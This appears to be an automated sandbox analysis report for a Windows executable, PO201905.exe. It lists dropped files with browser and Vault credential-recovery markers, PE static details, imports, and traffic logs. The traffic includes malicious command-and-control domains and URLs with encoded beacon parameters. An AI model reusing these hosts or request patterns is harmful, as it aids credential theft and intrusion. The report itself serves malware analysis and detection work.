MD5:	2F245469795B865BDD1B956C23D7893D
SHA1:	6AD80B974D3808F5A20EA1E766C7D2F88B9E5895
SHA-256:	1662D01A2D47B875A34FC7A8CD92E78CB2BA7F34023C7FD2639CBB10B8D94361
SHA-512:	909F189846A5D2DB208A5EB2E7CB3042C0F164CAF437E2B1B6DE608C0A70E4F3510B81B85753DBEEC1E211E6A83E6EA8C96AFF896E9B6E8ED42014473A54DC4F
Malicious:	true
Reputation:	high, very likely benign file
Preview:	....F.i.r.e.f.o.x. .R.e.c.o.v.e.r.y.....

C:\Users\user\AppData\Roaming\KM3N36B6\KM3logri.ini Download File
Process:	C:\Windows\System32\ipconfig.exe
File Type:	data
Size (bytes):	40
Entropy (8bit):	2.8420918598895937
Encrypted:	false
MD5:	D63A82E5D81E02E399090AF26DB0B9CB
SHA1:	91D0014C8F54743BBA141FD60C9D963F869D76C9
SHA-256:	EAECE2EBA6310253249603033C744DD5914089B0BB26BDE6685EC9813611BAAE
SHA-512:	38AFB05016D8F3C69D246321573997AAAC8A51C34E61749A02BF5E8B2B56B94D9544D65801511044E1495906A86DC2100F2E20FF4FCBED09E01904CC780FDBAD
Malicious:	true
Reputation:	high, very likely benign file
Preview:	....I.e.x.p.l.o.r. .R.e.c.o.v.e.r.y.....

C:\Users\user\AppData\Roaming\KM3N36B6\KM3logrv.ini Download File
Process:	C:\Windows\System32\ipconfig.exe
File Type:	data
Size (bytes):	40
Entropy (8bit):	2.96096404744368
Encrypted:	false
MD5:	BA3B6BC807D4F76794C4B81B09BB9BA5
SHA1:	24CB89501F0212FF3095ECC0ABA97DD563718FB1
SHA-256:	6EEBF968962745B2E9DE2CA969AF7C424916D4E3FE3CC0BB9B3D414ABFCE9507
SHA-512:	ECD07E601FC9E3CFC39ADDD7BD6F3D7F7FF3253AFB40BF536E9EAAC5A4C243E5EC40FBFD7B216CB0EA29F2517419601E335E33BA19DEA4A46F65E38694D465BF
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	...._._.V.a.u.l.t. .R.e.c.o.v.e.r.y.....

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.shakeitmiami.com	208.91.197.91	true	true		unknown
a767.dscg3.akamai.net	23.10.249.17	true	false		high
www.dazhen.ltd.w.kunlunsl.com	47.246.2.232	true	false	0%, virustotal, Browse	unknown
www.lianhe.ink	unknown	unknown	true		unknown
www.dazhen.ltd	unknown	unknown	true	0%, virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Reputation
http://www.dazhen.ltd/c917/	false	unknown
http://www.shakeitmiami.com/c917/?oHl4Lb5=nSCEaBLXfhTJ/xBIM1eG5VjHdYjSCo5E7UcE1As1Jcfg6SQ1mrA8W1jO4t4mCZy3/NbUbQ==&uFF4=XROl_rtXM	true	unknown
http://www.dazhen.ltd/c917/?oHl4Lb5=iGVqKJabq6qQQGosgk35PP7J8LpIY7g2/xqRC4FpH3ix1hS6w0nKWvUQXf0Fn5J++7YKhg==&uFF4=XROl_rtXM&sql=1	false	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000006.00000000.4495461915.0037D000.00000004.sdmp	false	high
http://www.%s.comPA	explorer.exe, 00000006.00000000.4496745744.01F30000.00000008.sdmp	false	high
http://go.	explorer.exe, 00000006.00000000.4490786039.05A85000.00000004.sdmp	false	high
http://wellformedweb.org/CommentAPI/	explorer.exe, 00000006.00000000.4489219800.04C00000.00000008.sdmp	false	high
http://www.autoitscript.com/favicon.ico	explorer.exe, 00000006.00000000.4489403773.04E37000.00000004.sdmp	false	high
http://www.autoitscript.com/site/autoit/	explorer.exe, 00000006.00000000.4489403773.04E37000.00000004.sdmp	false	high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Country	Flag	ASN	ASN Name	Malicious
208.91.197.91	Virgin Islands (BRITISH)		40034	unknown	true

Private

IP
192.168.1.22
192.168.1.255

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.945569120298503
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	PO201905.exe
File size:	885760
MD5:	27cf7e2be6e049b2793ad9f38218eb01
SHA1:	15c4909f9bb5db1b96992fee27a15221cccb4dbb
SHA256:	4a6f28896f4a16257ed2dbb0b71a3ed2d890b4be65b5f500b74c81a003155d61
SHA512:	d7aeef1afc03dac5404b2f877f6b70f4c89832eb16912ad7518b3e2211850536cae140a13c1a7e824fa9848fb440beb83ce5e889b7b29da218dc5f3b87095435
SSDEEP:	12288:32JZSgUuA/tdnWOsz9wDwwML2FD6rXNZpFCYNICoOW7SOsDVt6O:NuArnW/8R3FDmXNjw8A7ZsDVUO
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......RC.s.". .". .". yT. .". yT S". yT! .". .Z. .". .". t". yT% .". ..Q .". yT. .". Rich.". ........PE..L......\.................T.

File Icon


Icon Hash:	71f8dcd6d4d8702b

Static PE Info

General
Entrypoint:	0x401b33
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x5CCEA51E [Sun May 5 08:55:58 2019 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	a323b1d57aa1c73dbadfb65978c3b109

Entrypoint Preview

Instruction
call 00007FD7C90BB737h
jmp 00007FD7C90B93FEh
mov dword ptr [ecx], 004071A0h
jmp 00007FD7C90BB87Fh
mov edi, edi
push ebp
mov ebp, esp
push esi
mov esi, ecx
mov dword ptr [esi], 004071A0h
call 00007FD7C90BB86Ch
test byte ptr [ebp+08h], 00000001h
je 00007FD7C90B9579h
push esi
call 00007FD7C90B9CC3h
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
mov edi, edi
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FD7C90BB87Ah
mov dword ptr [esi], 004071A0h
mov eax, esi
pop esi
pop ebp
retn 0004h
mov edi, edi
push ebp
mov ebp, esp
sub esp, 10h
jmp 00007FD7C90B957Fh
push dword ptr [ebp+08h]
call 00007FD7C90B9C64h
pop ecx
test eax, eax
je 00007FD7C90B9581h
push dword ptr [ebp+08h]
call 00007FD7C90B908Fh
pop ecx
test eax, eax
je 00007FD7C90B9558h
leave
ret
test byte ptr [004CF7BCh], 00000001h
mov edi, 004CF7B0h
mov esi, 004071A0h
jne 00007FD7C90B959Eh
or dword ptr [004CF7BCh], 01h
push 00000001h
lea eax, dword ptr [ebp-04h]
push eax
mov ecx, edi
mov dword ptr [ebp-04h], 004071A8h
call 00007FD7C90BB72Ah
push 004062CAh
mov dword ptr [004CF7B0h], esi
call 00007FD7C90BB982h
pop ecx
push edi
lea ecx, dword ptr [ebp-10h]
call 00007FD7C90BB7FFh

Rich Headers

Programming Language:

[ASM] VS2010 build 30319
[LNK] VS2010 build 30319
[ C ] VS2010 build 30319
[IMP] VS2008 SP1 build 30729
[C++] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x946c	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xd1000	0x8da8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xda000	0x7ec	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x7180	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x90d0	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x150	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x52de	0x5400	False	0.620442708333	data	6.49783034543	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x2bd0	0x2c00	False	0.355912642045	data	5.00651352714	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0xc65e4	0xc5800	False	0.976582278481	data	7.99430221818	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0xd1000	0x8da8	0x8e00	False	0.600159551056	data	6.14689817549	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xda000	0x1902	0x1a00	False	0.268028846154	data	2.80220012818	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0xd1210	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0xd1678	0x988	data	English	United States
RT_ICON	0xd2000	0x10a8	dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 4166503206, next used block 4166109221	English	United States
RT_ICON	0xd30a8	0x25a8	dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 4098410274, next used block 4098148387	English	United States
RT_ICON	0xd5650	0x4228	dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 4032091437, next used block 4032943668	English	United States
RT_DIALOG	0xd9878	0x388	data	English	United States
RT_GROUP_ICON	0xd9c00	0x4c	data	English	United States
RT_MANIFEST	0xd9c4c	0x15a	ASCII text, with CRLF line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	Sleep, HeapReAlloc, HeapSize, GetStringTypeW, MultiByteToWideChar, RtlUnwind, HeapFree, LoadLibraryW, EnterCriticalSection, LeaveCriticalSection, RaiseException, GetCurrentProcessId, GetTickCount, QueryPerformanceCounter, DeleteCriticalSection, LCMapStringW, WriteFile, HeapAlloc, DecodePointer, EncodePointer, GetSystemTimeAsFileTime, GetCommandLineA, HeapSetInformation, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetProcAddress, GetModuleHandleW, ExitProcess, GetStdHandle, GetModuleFileNameW, HeapCreate, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, GetLastError, InterlockedDecrement, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, GetModuleFileNameA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, IsProcessorFeaturePresent
USER32.dll	EndPaint, DestroyWindow, GetMessageW, PostQuitMessage, FillRect, LoadCursorW, MessageBeep, SetFocus, BeginPaint, wsprintfW, TranslateMessage, LoadIconW, GetDlgItem, CharUpperW, ShowWindow, CreateDialogParamW, RegisterClassW, GetSystemMetrics, SetDlgItemTextW, SendMessageW, DefWindowProcW, DispatchMessageW, MessageBoxW
GDI32.dll	CreateSolidBrush, DeleteObject

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 6, 2019 21:25:09.905030012 CEST	49243	80	192.168.1.22	208.91.197.91
May 6, 2019 21:25:10.042212963 CEST	80	49243	208.91.197.91	192.168.1.22
May 6, 2019 21:25:10.042395115 CEST	49243	80	192.168.1.22	208.91.197.91
May 6, 2019 21:25:10.045095921 CEST	49243	80	192.168.1.22	208.91.197.91
May 6, 2019 21:25:10.183734894 CEST	80	49243	208.91.197.91	192.168.1.22
May 6, 2019 21:25:10.258433104 CEST	80	49243	208.91.197.91	192.168.1.22
May 6, 2019 21:25:10.258460999 CEST	80	49243	208.91.197.91	192.168.1.22
May 6, 2019 21:25:10.258491993 CEST	80	49243	208.91.197.91	192.168.1.22
May 6, 2019 21:25:10.258522034 CEST	80	49243	208.91.197.91	192.168.1.22
May 6, 2019 21:25:10.258925915 CEST	49243	80	192.168.1.22	208.91.197.91
May 6, 2019 21:25:10.261432886 CEST	49243	80	192.168.1.22	208.91.197.91
May 6, 2019 21:25:10.270538092 CEST	80	49243	208.91.197.91	192.168.1.22
May 6, 2019 21:25:10.270746946 CEST	49243	80	192.168.1.22	208.91.197.91
May 6, 2019 21:25:10.399070024 CEST	80	49243	208.91.197.91	192.168.1.22
May 6, 2019 21:25:56.164427042 CEST	49244	80	192.168.1.22	47.246.2.232
May 6, 2019 21:25:56.219522953 CEST	80	49244	47.246.2.232	192.168.1.22
May 6, 2019 21:25:56.219650030 CEST	49244	80	192.168.1.22	47.246.2.232
May 6, 2019 21:25:56.219759941 CEST	49244	80	192.168.1.22	47.246.2.232
May 6, 2019 21:25:56.275279045 CEST	80	49244	47.246.2.232	192.168.1.22
May 6, 2019 21:25:57.170886040 CEST	80	49244	47.246.2.232	192.168.1.22
May 6, 2019 21:25:57.170972109 CEST	80	49244	47.246.2.232	192.168.1.22
May 6, 2019 21:25:57.171016932 CEST	80	49244	47.246.2.232	192.168.1.22
May 6, 2019 21:25:57.171049118 CEST	80	49244	47.246.2.232	192.168.1.22
May 6, 2019 21:25:57.171081066 CEST	80	49244	47.246.2.232	192.168.1.22
May 6, 2019 21:25:57.171247959 CEST	49244	80	192.168.1.22	47.246.2.232
May 6, 2019 21:25:57.171394110 CEST	49244	80	192.168.1.22	47.246.2.232
May 6, 2019 21:25:57.171528101 CEST	49244	80	192.168.1.22	47.246.2.232
May 6, 2019 21:25:59.173449993 CEST	49245	80	192.168.1.22	47.246.2.232
May 6, 2019 21:25:59.233795881 CEST	80	49245	47.246.2.232	192.168.1.22
May 6, 2019 21:25:59.234023094 CEST	49245	80	192.168.1.22	47.246.2.232
May 6, 2019 21:25:59.238399982 CEST	49245	80	192.168.1.22	47.246.2.232
May 6, 2019 21:25:59.293483973 CEST	80	49245	47.246.2.232	192.168.1.22
May 6, 2019 21:25:59.293513060 CEST	80	49245	47.246.2.232	192.168.1.22
May 6, 2019 21:25:59.293603897 CEST	49245	80	192.168.1.22	47.246.2.232
May 6, 2019 21:25:59.348728895 CEST	80	49245	47.246.2.232	192.168.1.22
May 6, 2019 21:25:59.348788977 CEST	80	49245	47.246.2.232	192.168.1.22
May 6, 2019 21:25:59.348872900 CEST	49245	80	192.168.1.22	47.246.2.232
May 6, 2019 21:25:59.404644966 CEST	80	49245	47.246.2.232	192.168.1.22
May 6, 2019 21:25:59.404824018 CEST	80	49245	47.246.2.232	192.168.1.22
May 6, 2019 21:25:59.404845953 CEST	49245	80	192.168.1.22	47.246.2.232
May 6, 2019 21:25:59.404902935 CEST	80	49245	47.246.2.232	192.168.1.22
May 6, 2019 21:25:59.404923916 CEST	80	49245	47.246.2.232	192.168.1.22
May 6, 2019 21:25:59.404988050 CEST	49245	80	192.168.1.22	47.246.2.232
May 6, 2019 21:25:59.405173063 CEST	80	49245	47.246.2.232	192.168.1.22
May 6, 2019 21:25:59.405288935 CEST	49245	80	192.168.1.22	47.246.2.232
May 6, 2019 21:25:59.461594105 CEST	80	49245	47.246.2.232	192.168.1.22
May 6, 2019 21:25:59.461625099 CEST	80	49245	47.246.2.232	192.168.1.22
May 6, 2019 21:25:59.461714983 CEST	49245	80	192.168.1.22	47.246.2.232
May 6, 2019 21:25:59.461883068 CEST	80	49245	47.246.2.232	192.168.1.22
May 6, 2019 21:25:59.461941957 CEST	49245	80	192.168.1.22	47.246.2.232
May 6, 2019 21:25:59.461954117 CEST	80	49245	47.246.2.232	192.168.1.22
May 6, 2019 21:25:59.461977959 CEST	80	49245	47.246.2.232	192.168.1.22
May 6, 2019 21:25:59.461997986 CEST	80	49245	47.246.2.232	192.168.1.22
May 6, 2019 21:25:59.461999893 CEST	49245	80	192.168.1.22	47.246.2.232
May 6, 2019 21:25:59.462032080 CEST	80	49245	47.246.2.232	192.168.1.22
May 6, 2019 21:25:59.462052107 CEST	80	49245	47.246.2.232	192.168.1.22
May 6, 2019 21:25:59.462106943 CEST	49245	80	192.168.1.22	47.246.2.232
May 6, 2019 21:25:59.462863922 CEST	80	49245	47.246.2.232	192.168.1.22
May 6, 2019 21:25:59.462874889 CEST	80	49245	47.246.2.232	192.168.1.22
May 6, 2019 21:25:59.462923050 CEST	49245	80	192.168.1.22	47.246.2.232
May 6, 2019 21:25:59.465658903 CEST	49245	80	192.168.1.22	47.246.2.232
May 6, 2019 21:25:59.516999960 CEST	80	49245	47.246.2.232	192.168.1.22
May 6, 2019 21:25:59.517127991 CEST	49245	80	192.168.1.22	47.246.2.232
May 6, 2019 21:25:59.517447948 CEST	80	49245	47.246.2.232	192.168.1.22
May 6, 2019 21:25:59.517482996 CEST	80	49245	47.246.2.232	192.168.1.22
May 6, 2019 21:25:59.517502069 CEST	80	49245	47.246.2.232	192.168.1.22
May 6, 2019 21:25:59.517543077 CEST	49245	80	192.168.1.22	47.246.2.232
May 6, 2019 21:25:59.517580032 CEST	80	49245	47.246.2.232	192.168.1.22
May 6, 2019 21:25:59.517663956 CEST	49245	80	192.168.1.22	47.246.2.232
May 6, 2019 21:25:59.517698050 CEST	80	49245	47.246.2.232	192.168.1.22
May 6, 2019 21:25:59.517832041 CEST	80	49245	47.246.2.232	192.168.1.22
May 6, 2019 21:25:59.518393040 CEST	80	49245	47.246.2.232	192.168.1.22
May 6, 2019 21:25:59.518428087 CEST	80	49245	47.246.2.232	192.168.1.22
May 6, 2019 21:25:59.520612955 CEST	80	49245	47.246.2.232	192.168.1.22
May 6, 2019 21:25:59.520831108 CEST	80	49245	47.246.2.232	192.168.1.22
May 6, 2019 21:25:59.521303892 CEST	80	49245	47.246.2.232	192.168.1.22
May 6, 2019 21:25:59.572424889 CEST	80	49245	47.246.2.232	192.168.1.22
May 6, 2019 21:25:59.572527885 CEST	80	49245	47.246.2.232	192.168.1.22
May 6, 2019 21:25:59.572669983 CEST	80	49245	47.246.2.232	192.168.1.22
May 6, 2019 21:25:59.572745085 CEST	80	49245	47.246.2.232	192.168.1.22
May 6, 2019 21:25:59.572837114 CEST	80	49245	47.246.2.232	192.168.1.22
May 6, 2019 21:25:59.573136091 CEST	80	49245	47.246.2.232	192.168.1.22
May 6, 2019 21:25:59.573323965 CEST	80	49245	47.246.2.232	192.168.1.22
May 6, 2019 21:25:59.573347092 CEST	80	49245	47.246.2.232	192.168.1.22
May 6, 2019 21:25:59.573421955 CEST	80	49245	47.246.2.232	192.168.1.22
May 6, 2019 21:25:59.612500906 CEST	80	49245	47.246.2.232	192.168.1.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 6, 2019 21:17:09.967242002 CEST	50635	53	192.168.1.22	8.8.8.8
May 6, 2019 21:17:10.004884005 CEST	53	50635	8.8.8.8	192.168.1.22
May 6, 2019 21:17:10.952919006 CEST	50635	53	192.168.1.22	8.8.8.8
May 6, 2019 21:17:10.978876114 CEST	53	50635	8.8.8.8	192.168.1.22
May 6, 2019 21:17:11.954483986 CEST	50635	53	192.168.1.22	8.8.8.8
May 6, 2019 21:17:11.980263948 CEST	53	50635	8.8.8.8	192.168.1.22
May 6, 2019 21:17:13.954442978 CEST	50635	53	192.168.1.22	8.8.8.8
May 6, 2019 21:17:13.966229916 CEST	53	50635	8.8.8.8	192.168.1.22
May 6, 2019 21:17:17.986201048 CEST	50635	53	192.168.1.22	8.8.8.8
May 6, 2019 21:17:18.018807888 CEST	53	50635	8.8.8.8	192.168.1.22
May 6, 2019 21:17:36.267689943 CEST	49157	53	192.168.1.22	8.8.8.8
May 6, 2019 21:17:36.294394016 CEST	53	49157	8.8.8.8	192.168.1.22
May 6, 2019 21:17:37.265341997 CEST	49157	53	192.168.1.22	8.8.8.8
May 6, 2019 21:17:37.280246973 CEST	53	49157	8.8.8.8	192.168.1.22
May 6, 2019 21:17:38.283725977 CEST	49157	53	192.168.1.22	8.8.8.8
May 6, 2019 21:17:38.309889078 CEST	53	49157	8.8.8.8	192.168.1.22
May 6, 2019 21:17:40.281224966 CEST	49157	53	192.168.1.22	8.8.8.8
May 6, 2019 21:17:40.292939901 CEST	53	49157	8.8.8.8	192.168.1.22
May 6, 2019 21:17:44.281518936 CEST	49157	53	192.168.1.22	8.8.8.8
May 6, 2019 21:17:44.318830013 CEST	53	49157	8.8.8.8	192.168.1.22
May 6, 2019 21:18:19.986705065 CEST	62364	53	192.168.1.22	8.8.8.8
May 6, 2019 21:18:20.028804064 CEST	53	62364	8.8.8.8	192.168.1.22
May 6, 2019 21:18:20.079745054 CEST	52081	53	192.168.1.22	8.8.8.8
May 6, 2019 21:18:20.127438068 CEST	53	52081	8.8.8.8	192.168.1.22
May 6, 2019 21:18:55.404128075 CEST	51848	53	192.168.1.22	8.8.8.8
May 6, 2019 21:18:55.430469990 CEST	53	51848	8.8.8.8	192.168.1.22
May 6, 2019 21:18:56.391324043 CEST	51848	53	192.168.1.22	8.8.8.8
May 6, 2019 21:18:56.417475939 CEST	53	51848	8.8.8.8	192.168.1.22
May 6, 2019 21:18:57.391072035 CEST	51848	53	192.168.1.22	8.8.8.8
May 6, 2019 21:18:57.417574883 CEST	53	51848	8.8.8.8	192.168.1.22
May 6, 2019 21:18:59.391266108 CEST	51848	53	192.168.1.22	8.8.8.8
May 6, 2019 21:18:59.417689085 CEST	53	51848	8.8.8.8	192.168.1.22
May 6, 2019 21:19:03.391630888 CEST	51848	53	192.168.1.22	8.8.8.8
May 6, 2019 21:19:03.418196917 CEST	53	51848	8.8.8.8	192.168.1.22
May 6, 2019 21:21:59.798739910 CEST	50087	53	192.168.1.22	8.8.8.8
May 6, 2019 21:21:59.834451914 CEST	53	50087	8.8.8.8	192.168.1.22
May 6, 2019 21:22:00.796506882 CEST	50087	53	192.168.1.22	8.8.8.8
May 6, 2019 21:22:00.832596064 CEST	53	50087	8.8.8.8	192.168.1.22
May 6, 2019 21:22:01.796924114 CEST	50087	53	192.168.1.22	8.8.8.8
May 6, 2019 21:22:01.834335089 CEST	53	50087	8.8.8.8	192.168.1.22
May 6, 2019 21:22:03.796714067 CEST	50087	53	192.168.1.22	8.8.8.8
May 6, 2019 21:22:03.839104891 CEST	53	50087	8.8.8.8	192.168.1.22
May 6, 2019 21:22:07.797175884 CEST	50087	53	192.168.1.22	8.8.8.8
May 6, 2019 21:22:07.823040962 CEST	53	50087	8.8.8.8	192.168.1.22
May 6, 2019 21:22:09.627001047 CEST	53714	53	192.168.1.22	8.8.8.8
May 6, 2019 21:22:09.676675081 CEST	53	53714	8.8.8.8	192.168.1.22
May 6, 2019 21:22:09.814558029 CEST	58491	53	192.168.1.22	8.8.8.8
May 6, 2019 21:22:09.840512991 CEST	53	58491	8.8.8.8	192.168.1.22
May 6, 2019 21:24:14.331088066 CEST	56832	53	192.168.1.22	8.8.8.8
May 6, 2019 21:24:14.343302011 CEST	53	56832	8.8.8.8	192.168.1.22
May 6, 2019 21:24:15.327708960 CEST	56832	53	192.168.1.22	8.8.8.8
May 6, 2019 21:24:15.339847088 CEST	53	56832	8.8.8.8	192.168.1.22
May 6, 2019 21:24:16.328756094 CEST	56832	53	192.168.1.22	8.8.8.8
May 6, 2019 21:24:16.399303913 CEST	53	56832	8.8.8.8	192.168.1.22
May 6, 2019 21:24:18.328789949 CEST	56832	53	192.168.1.22	8.8.8.8
May 6, 2019 21:24:18.344229937 CEST	53	56832	8.8.8.8	192.168.1.22
May 6, 2019 21:24:22.328088999 CEST	56832	53	192.168.1.22	8.8.8.8
May 6, 2019 21:24:22.354471922 CEST	53	56832	8.8.8.8	192.168.1.22
May 6, 2019 21:25:09.725291967 CEST	55764	53	192.168.1.22	8.8.8.8
May 6, 2019 21:25:09.888335943 CEST	53	55764	8.8.8.8	192.168.1.22
May 6, 2019 21:25:34.826957941 CEST	50859	53	192.168.1.22	8.8.8.8
May 6, 2019 21:25:34.863375902 CEST	53	50859	8.8.8.8	192.168.1.22
May 6, 2019 21:25:39.129262924 CEST	52814	53	192.168.1.22	8.8.8.8
May 6, 2019 21:25:39.164378881 CEST	53	52814	8.8.8.8	192.168.1.22
May 6, 2019 21:25:55.487379074 CEST	51910	53	192.168.1.22	8.8.8.8
May 6, 2019 21:25:56.163670063 CEST	53	51910	8.8.8.8	192.168.1.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 6, 2019 21:25:09.725291967 CEST	192.168.1.22	8.8.8.8	0xc58d	Standard query (0)	www.shakeitmiami.com	A (IP address)	IN (0x0001)
May 6, 2019 21:25:34.826957941 CEST	192.168.1.22	8.8.8.8	0xed91	Standard query (0)	www.lianhe.ink	A (IP address)	IN (0x0001)
May 6, 2019 21:25:39.129262924 CEST	192.168.1.22	8.8.8.8	0xbb4c	Standard query (0)	www.lianhe.ink	A (IP address)	IN (0x0001)
May 6, 2019 21:25:55.487379074 CEST	192.168.1.22	8.8.8.8	0xa16	Standard query (0)	www.dazhen.ltd	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
May 6, 2019 21:17:44.318830013 CEST	8.8.8.8	192.168.1.22	0x13f5	No error (0)	a767.dscg3.akamai.net		23.10.249.17	A (IP address)	IN (0x0001)
May 6, 2019 21:17:44.318830013 CEST	8.8.8.8	192.168.1.22	0x13f5	No error (0)	a767.dscg3.akamai.net		23.10.249.50	A (IP address)	IN (0x0001)
May 6, 2019 21:21:59.834451914 CEST	8.8.8.8	192.168.1.22	0xedc4	No error (0)	a767.dscg3.akamai.net		23.10.249.50	A (IP address)	IN (0x0001)
May 6, 2019 21:21:59.834451914 CEST	8.8.8.8	192.168.1.22	0xedc4	No error (0)	a767.dscg3.akamai.net		23.10.249.17	A (IP address)	IN (0x0001)
May 6, 2019 21:22:00.832596064 CEST	8.8.8.8	192.168.1.22	0xedc4	No error (0)	a767.dscg3.akamai.net		23.10.249.17	A (IP address)	IN (0x0001)
May 6, 2019 21:22:00.832596064 CEST	8.8.8.8	192.168.1.22	0xedc4	No error (0)	a767.dscg3.akamai.net		23.10.249.50	A (IP address)	IN (0x0001)
May 6, 2019 21:22:07.823040962 CEST	8.8.8.8	192.168.1.22	0xedc4	No error (0)	a767.dscg3.akamai.net		23.10.249.50	A (IP address)	IN (0x0001)
May 6, 2019 21:22:07.823040962 CEST	8.8.8.8	192.168.1.22	0xedc4	No error (0)	a767.dscg3.akamai.net		23.10.249.17	A (IP address)	IN (0x0001)
May 6, 2019 21:24:16.399303913 CEST	8.8.8.8	192.168.1.22	0x2140	No error (0)	a767.dscg3.akamai.net		23.10.249.17	A (IP address)	IN (0x0001)
May 6, 2019 21:24:16.399303913 CEST	8.8.8.8	192.168.1.22	0x2140	No error (0)	a767.dscg3.akamai.net		23.10.249.50	A (IP address)	IN (0x0001)
May 6, 2019 21:24:22.354471922 CEST	8.8.8.8	192.168.1.22	0x2140	No error (0)	a767.dscg3.akamai.net		23.10.249.17	A (IP address)	IN (0x0001)
May 6, 2019 21:24:22.354471922 CEST	8.8.8.8	192.168.1.22	0x2140	No error (0)	a767.dscg3.akamai.net		23.10.249.50	A (IP address)	IN (0x0001)
May 6, 2019 21:25:09.888335943 CEST	8.8.8.8	192.168.1.22	0xc58d	No error (0)	www.shakeitmiami.com		208.91.197.91	A (IP address)	IN (0x0001)
May 6, 2019 21:25:34.863375902 CEST	8.8.8.8	192.168.1.22	0xed91	Name error (3)	www.lianhe.ink	none	none	A (IP address)	IN (0x0001)
May 6, 2019 21:25:39.164378881 CEST	8.8.8.8	192.168.1.22	0xbb4c	Name error (3)	www.lianhe.ink	none	none	A (IP address)	IN (0x0001)
May 6, 2019 21:25:56.163670063 CEST	8.8.8.8	192.168.1.22	0xa16	No error (0)	www.dazhen.ltd	www.dazhen.ltd.w.kunlunsl.com		CNAME (Canonical name)	IN (0x0001)
May 6, 2019 21:25:56.163670063 CEST	8.8.8.8	192.168.1.22	0xa16	No error (0)	www.dazhen.ltd.w.kunlunsl.com		47.246.2.232	A (IP address)	IN (0x0001)
May 6, 2019 21:25:56.163670063 CEST	8.8.8.8	192.168.1.22	0xa16	No error (0)	www.dazhen.ltd.w.kunlunsl.com		47.246.2.231	A (IP address)	IN (0x0001)
May 6, 2019 21:25:56.163670063 CEST	8.8.8.8	192.168.1.22	0xa16	No error (0)	www.dazhen.ltd.w.kunlunsl.com		47.246.2.226	A (IP address)	IN (0x0001)
May 6, 2019 21:25:56.163670063 CEST	8.8.8.8	192.168.1.22	0xa16	No error (0)	www.dazhen.ltd.w.kunlunsl.com		47.246.2.230	A (IP address)	IN (0x0001)
